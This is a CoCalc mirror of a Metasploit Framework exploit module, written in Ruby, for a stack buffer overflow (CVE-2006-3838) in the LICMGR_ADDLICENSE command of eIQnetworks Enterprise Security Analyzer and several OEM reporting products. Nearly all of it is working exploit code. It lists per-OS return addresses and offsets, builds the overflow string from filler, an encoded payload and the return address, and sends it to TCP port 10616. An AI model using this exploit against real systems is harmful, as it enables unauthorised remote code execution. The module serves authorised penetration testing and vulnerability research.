Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/eiqnetworks_esa.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in eIQnetworks

18
          Enterprise Security Analyzer. During the processing of

19
          long arguments to the LICMGR_ADDLICENSE command, a stack-based

20
          buffer overflow occurs. This module has only been tested

21
          against ESA v2.1.13.

22
        },

23
        'Author' => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>', 'kf' ],

24
        'References' => [

25
          ['CVE', '2006-3838'],

26
          ['OSVDB', '27526'],

27
          ['BID', '19163'],

28
          ['ZDI', '06-024'],

29
        ],

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'seh',

32
        },

33
        'Payload' => {

34
          'Space' => 400,

35
          'BadChars' => "\x00",

36
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],

41


42
          ['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 494 } ], # call ebx

43
          ['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 494 } ],	# jmp ebx

44
          ['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 494 } ], # jmp EBX

45
          ['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],

46
          ['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],

47
          ['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

48
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],

49
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],

50
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

51
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],

52
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],

53
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

54
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],

55
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],

56
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

57
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],

58
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],

59
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

60
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],

61
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],

62
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

63
        ],

64
        'Privileged' => false,

65
        'DisclosureDate' => '2006-07-24',

66
        'Notes' => {

67
          'Reliability' => UNKNOWN_RELIABILITY,

68
          'Stability' => UNKNOWN_STABILITY,

69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

70
        }

71
      )

72
    )

73


74
    register_options(

75
      [

76
        Opt::RPORT(10616)

77
      ]

78
    )

79
  end

80


81
  def exploit

82
    connect

83


84
    print_status("Trying target #{target.name}...")

85


86
    filler = rand_text_english(1) * (target['Offset'] - payload.encoded.length)

87
    sploit = "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') + "&";

88


89
    sock.put(sploit)

90


91
    handler

92
    disconnect

93
  end

94
end

95


96